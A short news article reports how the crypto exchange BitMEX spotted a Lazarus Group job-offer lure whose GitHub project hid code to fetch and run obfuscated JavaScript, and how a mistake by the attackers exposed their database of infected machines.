BitMEX Prevents North Korean Cyberattack, Exposing Hacker Group Mistakes

_{Photo credit: Piotr Swat / Shutterstock.com}

The cryptocurrency exchange BitMEX has successfully stopped an attempted cyberattack by Lazarus Group, a cybercriminal organization linked to North Korea and the 2014 attack on Sony. The attack began with a BitMEX employee receiving a fraudulent job offer on LinkedIn to work at a fake NFT marketplace. 

This is a tactic known to be used by Lazarus, and the employee immediately flagged the email, leading to an investigation.

In the LinkedIn message, the attackers had shared a GitHub repository containing a Next.js/React project, which concealed malicious code designed to execute harmful scripts on BitMEX’s system. 

Among the threats, BitMEX’s security analysts found code that would have collected and executed obfuscated JavaScript from suspicious domains. One domain had been previously linked to the Lazarus Group by cybersecurity firm Palo Alto Networks’ Unit 42, which tracks cybercriminal activity associated with North Korea.

Further analysis revealed a rare mistake and gave access to a Supabase database used by the hackers. This database contained logs of 37 infected machines, with usernames, hostnames, operating systems, IP addresses, geolocations, and timestamps. 

While most IP addresses were masked using VPNs, one entry was a likely residential IP in Jiaxing, China. This potentially reveals the real location of a Lazarus operator in a significant security lapse for the secretive group.

In response, BitMEX has developed an internal monitoring tool that continuously pings the compromised database, collecting data on infections and further mistakes by the attackers. 

The incident highlights the vulnerability of crypto exchange platforms, as well as the importance of employee training about threats.